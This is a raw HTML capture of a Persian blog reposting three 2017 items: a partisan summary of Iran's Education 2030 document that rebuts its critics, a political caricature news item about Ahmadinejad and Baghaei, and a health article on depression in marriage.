0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div> text/html 2017-06-02T12:57:45+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی خلاصه سند 2030 ؛ آنچه دلواپسان گفتند، آنچه در سند آمده است http://1001SHAYADOBAYAD.mihanblog.com/post/3502 <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <h1 style="line-height: 3.5; margin: 0px; padding: 0px" class="title"> <font face="Arial"> <span style="text-decoration: overline blink; letter-spacing: 3pt; vertical-align: bottom; background-color: #F2F2F2"> <a href="http://www.asriran.com/fa/news/540858/خلاصه-سند-2030-را-اینجا-بخوانید-آنچه-دلواپسان-گفتند-آنچه-در-سند-آمده-است" target="_blank"> <font size="6">خلاصه سند 2030 ؛ آنچه دلواپسان گفتند، آنچه در سند آمده است</font></a> </span></font></h1> <p style="line-height: 70px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font></b><div style="direction: rtl"><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font></b><div class="subtitle" style="margin-bottom: 10px"><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> &nbsp;</font></b><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #CCFFFF"><font size="4" face="Microsoft Sans Serif" color="#CE0000"><p style="line-height: 50px; margin-top: 0; margin-bottom: 0">&nbsp;آنها مدعی بودند که در سند 2030 آموزش خودارضایی و همجنسگرایی در مدارس الزامی خواهد شد این در حالی است که حتی یک بار هم در سند، این کلمات نیامده است.</p></font></b></div><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #CCFFFF"><font size="4" face="Microsoft Sans Serif" color="#CE0000"> </font> <font size="4" face="Microsoft Sans Serif" color="#0033CC"> </font></b><div class="body" style="text-align: justify; padding: 10px"><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #CCFFFF"><font size="4" face="Microsoft Sans Serif" color="#0033CC"> </font><p style="line-height: 50px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0033CC"> <span style="color: rgb(0, 0, 205)">&nbsp;عصر ایران -</span> در جریان رقابت های انتخاباتی، دلواپسان با انتشار مطالبی در خصوص سند 2030 و آن گونه که رئیس جمهور روحانی گفته است، حتی با ارائه گزارش خلاف واقع به رهبر معظم انقلاب، موجی از نگرانی را در جامعه به ویژه بین خانواده ها ، فرهنگیان و نیز متدینین راه انداختند.&nbsp; <br> </font> <font size="4" face="Microsoft Sans Serif" color="#800080"> &nbsp;آنها مدعی بودند که در سند 2030 که ایران آن را پذیرفته، آموزش های جنسی شامل خودارضایی و همجنسگرایی در مدارس الزامی خواهد شد و حتی برخی پا فراتر گذاشتند و مدعی شدند که ارائه این آموزش ها با چاپ کتابی به نام "لک لکی در کار نیست" توسط آموزش و پرورش(!)در برخی مدارس شروع شده و به زودی فراگیر خواهد شد. این در حالی است که حتی یک بار هم در این سند،کلمات خودارضایی و همجنسگرایی نیامده است و تماماً ساخته و پرداخته اتاق های علمیات روانی دلواپسان بود.<br> &nbsp;</font></p> </b> <font size="4" face="Microsoft Sans Serif" color="#0033CC"> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #CCFFFF"> <p style="line-height: 50px; margin-top: 0; margin-bottom: 0"> <img style="border: 0px none; " alt="خلاصه سند 2030 را اینجا بخوانید/ آنچه دلواپسان گفتند، آنچه در سند آمده است" title="خلاصه سند 2030 را اینجا بخوانید/ آنچه دلواپسان گفتند، آنچه در سند آمده است" src="http://cdn.asriran.com/files/fa/news/1396/3/4/704118_795.jpg" class="img-responsive" align="right" width="500"><br> &nbsp;</p> </b> </font> <b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #CCFFFF"> <font size="4" face="Microsoft Sans Serif" color="#800080"> </font><p style="line-height: 50px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#800080">&nbsp;آنها در ایام تبلیغات انتخاباتی، هم در فضای مجازی این شایعات را پراکندند و هم با چاپ تراکت هایی در تیراژ میلیونی و توزیع آن در مناطق مختلف به ویژه در روستاها و نیز با سخنرانی های متعدد انتخاباتی و تبلیغات چهره به چهره خیابانی، کوشیدند نگرانی های اخلاقی را تشدید کنند.<br> </font> <font size="4" face="Microsoft Sans Serif" color="#0033CC"> &nbsp;از آنجا که قریب به اتفاق مردم و حتی آنان که این شایعات را می پراکندند، حتی یک بار هم این سند را ندیده اند و با توجه به این که متن سند بسیار طولانی است، عصر ایران برای روشن شدن موضوع و افشا شدن چهره دروغگویانی که با نقاب ارزش ها، ضد ارزشی ترین اقدامات را مرتکب شدند، متن خلاصه شده سند را منتشر می کند.<br> </font> <font size="4" face="Microsoft Sans Serif" color="#00B700"> نکته اینجاست که دولت جمهوری اسلامی ایران درباره این سند با استفاده از قاعده حقوقی حق تحفظ، اعلام کرده است اگر جایی از سند با فرهنگ و دین مردم ایران در تقابل باشد، تعهدی نسبت به آن ندارد.</font><font size="4" face="Microsoft Sans Serif" color="#0033CC"><br> &nbsp;خودتان بخوانید و ببینید آنچه دلواپسان از این سند ترسیم کرده بودند کجا و خود سند کجا؟! دلواپسان، قطعاً یک عذرخواهی تاریخی به رهبر انقلاب، رئیس جمهور و مردم ایران بدهکارند. <br> <br> <span style="font-weight: bold; color: rgb(0, 0, 205)">خلاصه سند 2030&nbsp; </span><br> &nbsp;سند مقدمه ای دارد مبنی بر این که رهبران و مردم جهان بر آن هستند که تا سال 2030، به فقر،گرسنگی ،خشونت، فساد، قاچاق و ... پایان دهند و به سوی کرامت انسانی، صلح، عدالت، رعایت برابری، رفاه، ، مدیریت پایدار منابع طبیعی،گسترش بهداشت، تامین آب آشامیدنی برای همه، توانمندسازی زنان و دختران، محترم شمردن تنوع فرهنگی،حمایت از اقشار آسیب پذیر، مردمسالاری، بهبود محیط زیست، توسعه مناطق روستایی،توسعه آموزش های عمومی و فنی و حرفه ای، ترویج تفاهم، اشتغالزایی، و نظایر این ها حرکت کنند.<br> &nbsp;</font></p><font size="4" face="Microsoft Sans Serif" color="#0033CC"> </font></b></div><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #CCFFFF"><font size="4" face="Microsoft Sans Serif" color="#0033CC"> </font></b></div><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #CCFFFF"><font size="4" face="Microsoft Sans Serif" color="#0033CC"> </font></b> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font size="5" face="Arial"> <span style="font-weight: bold; text-decoration: overline"> <span style="text-decoration: overline; "> <b style="color: rgb(68, 68, 68); font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFFF"> <span style="background-color: rgb(255, 255, 102);">برای دیدن متن کامل سند 2030</span></b></span><span style="background-color: rgb(255, 255, 102);"><span style="text-decoration: overline;"><b style="color: rgb(68, 68, 68); font-style: normal; font-variant: normal; line-height: 56px; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px;"> <a href="http://cdn.asriran.com/files/fa/news/1396/3/4/704110_622.pdf"> اینجا </a></b></span><span style="text-decoration: overline; "> <b style="color: rgb(68, 68, 68); font-style: normal; font-variant: normal; line-height: 56px; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px;"> کلیک کنید.</b></span></span></span></font></p> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div></div> text/html 2017-05-31T21:34:17+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی شغل جدید احمدی نژاد و بقایی!/کاریکاتور http://1001SHAYADOBAYAD.mihanblog.com/post/3501 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><br><div class="item-page"> <h2> <a href="http://www.beytoote.com/news/politics-social/tnews98008.html"> <font color="#000099"><span style="background-color: rgb(255, 255, 204);"><font size="6" face="arial,helvetica,sans-serif">شغل جدید احمدی نژاد و بقایی!/کاریکاتور</font></span></font></a> </h2> <dl class="article-info"><dd class="category-name"> <font size="3">مجموعه: <a href="http://www.beytoote.com/news/politics-social.html">اخبار سیاسی و اجتماعی</a> </font></dd><dd class="published"><font size="3"> تاریخ انتشار : چهارشنبه, 10 خرداد 1396 08:34 </font></dd></dl><font size="3"> </font><br><br> <p style="text-align: justify;">&nbsp;<font color="#3333FF"><span style="background-color: rgb(204, 255, 255);"><font size="5"><b><font face="Mihan-Koodak"> احمدی نژاد و بقایی در اقدامی عجیب به بهانه تخلیه ساختمان محافظان، با اعلام شماره حساب شخصی از مردم خواستند به آنها پول بدهند و توضیح دادند پول را برای تامین هزینه فعالیت های فرهنگی و اجتماعی شان می خواهند!</font></b></font></span></font></p><font color="#3333FF"><span style="background-color: rgb(204, 255, 255);"><font size="5"><b><font face="Mihan-Koodak"> </font></b></font></span></font><p style="text-align: justify;"><font color="#3333FF"><span style="background-color: rgb(204, 255, 255);"><font size="5"><b><font face="Mihan-Koodak">&nbsp;</font></b></font></span></font></p> <p class="imgarticle"><img style="max-width: 480px;" title=" اخبارسیاسی ,خبرهای سیاسی ,احمدی نژاد و بقایی " src="http://www.beytoote.com/images/stories/news/96/03/9603-40t1543.jpg" alt=" اخبارسیاسی ,خبرهای سیاسی ,احمدی نژاد و بقایی "></p> <p style="text-align: justify;"><span style="color: #808080;">&nbsp;</span></p> <p style="text-align: justify;"><span style="color: #808080;">اخبار &nbsp;سیاسی &nbsp;-&nbsp;&nbsp;خبرآنلاین/فیروزه مظفری</span></p> </div><br> <b></b> <font style="font-size:8pt;"> </font> </div> text/html 2017-05-31T12:33:13+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی افسردگی بلای رابطه زن و شوهرها http://1001SHAYADOBAYAD.mihanblog.com/post/3500 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <br><div id="TotalDocDiv"><font color="#CC0000"><span style="background-color: rgb(204, 204, 255);"><br></span></font><br><b><font size="6" face="arial,helvetica,sans-serif"><a href="http://migna.ir/vdch6wnk.23nvqdftt2.html" title="[1396-03-08 23:09] زندگی با وجود افسردگی نه فقط برای فرد افسرده دشوار است بلکه همه روابط فرد را مختل می‌کند. یک رابطه عاطفی ..."><font color="#990000"><span style="background-color: rgb(204, 204, 255);">&nbsp;&nbsp; افسردگی بلای رابطه زن و شوهرها&nbsp;&nbsp;</span></font> </a></font></b><br><br><div id="docDiv3Date"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak">تاریخ انتشار : <span>دوشنبه ۸ خرداد ۱۳۹۶ ساعت ۲۳:۰۹</span></font></span></font></div><div class="clear"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak">&nbsp;</font></span></font></div></div><div id="leadtxt"> <div class="back_lead"> <div id="docDiv4Lead"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">زندگی با وجود افسردگی نه فقط برای فرد افسرده دشوار است بلکه همه روابط فرد را مختل می‌کند. یک رابطه عاطفی با وجود افسردگی بسیار دشوار پیش می‌رود بنابراین اگر با فردی افسرده زندگی می‌کنید باید فوراً به فکر اقدامی برای بهبود فرد بیمار و رابطه باشید.<br><br></font></span></font></div><font size="5"> </font></div><font size="5"> </font></div><div id="docDiv1"><div id="doc_div6"> <div id="doc_div1Img"> <font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak"><img src="http://migna.ir/images/docs/000040/n00040978-b.jpg" alt="افسردگی بلای رابطه زن و شوهرها" title="افسردگی بلای رابطه زن و شوهرها" id="docBigImg" vspace="0" hspace="0" height="349" border="0" width="525"><br><br></font></span></font></div></div></div><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak"> </font></span></font><div class="description entry-content" itemprop="articleBody" align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">به گزارش میگنا به نقل از ایران بانو ضمیمه روزنامه ایران، هر تعللی باعث تشدید بیماری و از دست رفتن بیشتر این رابطه می‌شود. زوج‌های افسرده نه برابر بیشتر از افراد دیگر تمایل به جدایی دارند. علاوه بر این زندگی با فرد افسرده احتمال افسرده شدن دیگری را نیز بیشتر می‌کند. هرچقدر میزان افسردگی شدید‌تر باشد احتمال گرایش به مصرف الکل، مواد مخدر و خودکشی نیز بیشتر می‌شود. </font></span></font><p><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">افسردگی به‌ عنوان یکی از چالش‌های بسیار مهم روابط مشترک عنوان می‌شود،اما چیزی که باید بدانید اینکه افسردگی یک انتخاب نیست. این بیماری به اندازه بیماری دیابت خطرناک و هشدار دهنده است. افسردگی رویکرد انسان را به زندگی تغییر می‌دهد، طرز فکر، خلق و خو، خواب، ذائقه و میزان انرژی فرد با این بیماری بشدت تغییر می‌کند؛ استرس زیاد، مشکلات مالی، تغییرات شدید، تولد فرزند، پدریا مادر شدن، مصرف برخی داروها و تغییراتی در وضعیت جسمی و سلامتی مهم‌ترین عوامل افسردگی هستند. رابطه مشترک نیز به خودی خود می‌تواند عاملی برای ایجاد افسردگی باشد. از هر ۱۰ زن یا مرد حداقل یک نفر بعد از شروع رابطه دچار افسردگی می‌شود. روابط ناسالم و پرمساله نیز عاملی برای ایجاد یا تشدید افسردگی هستند.</font></span></font></p> <p><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">چیزی که باید بدانید اینکه افسردگی به آهستگی می‌آید و به همه زندگی سرایت می‌کند. فرد افسرده گمان می‌کند می‌تواند تغییرات روحی جزئی را به تنهایی مدیریت کند اما اغلب این کار در توانش نیست، برای همین بسیار مهم است که زود دست به کار شوید و برای بهبود وضعیت شریک زندگی‌تان اقدام کنید.<br>بی‌توجهی به تغییرات روحی طرف مقابل به مرور زمان باعث شدید شدن علائم بیماری می‌شود؛ ۶۰ درصد افرادی که خودکشی می‌کنند در ابتدا فقط دچار کمی افسردگی بودند. اگر برای‌تان محرز است که همسرتان افسرده است او را رها نکنید تا به مرور زمان و به تنهایی درمان شود. اگر درمانی آغاز نشود این بیماری هرگز تمام نمی‌شود.<br>وقتی تغییرات مهم و جدی در خلق و خوی شریک زندگی‌تان می‌بینید و آن را با برخی ویژگی‌های افسردگی مشابه می‌دانید برای تشخیص درست حتماً به پزشک مراجعه کنید. تشخیص شما و ارائه راه‌حل‌های ناشیانه کمکی به درمان این بیماری نمی‌کند، چون شما درکی از زنگ‌خطرها، میزان و شدت بیماری و نحوه درست درمان ندارید. برای تشویق همسرتان برای اینکه به پزشک مراجعه کند از نگرانی‌های خودتان بگویید؛ مثل اینکه تغییرات روحی او باعث نگرانی‌تان شده است و شما دوست دارید برای بهبود این وضعیت به او کمک کنید.</font></span></font></p></div><br> <b></b> <font style="font-size:8pt;"> <br> <font size="3">برچسب ها: <a href="/post/tag/افسردگی">افسردگی</a>، <a href="/post/tag/رابطه زن و شوهر">رابطه زن و شوهر</a>، <a href="/post/tag/خلق و خو">خلق و خو</a>، <a href="/post/tag/استرس زیاد">استرس زیاد</a>، <a href="/post/tag/خودکشی">خودکشی</a>،</font><br><br><br></font> </div>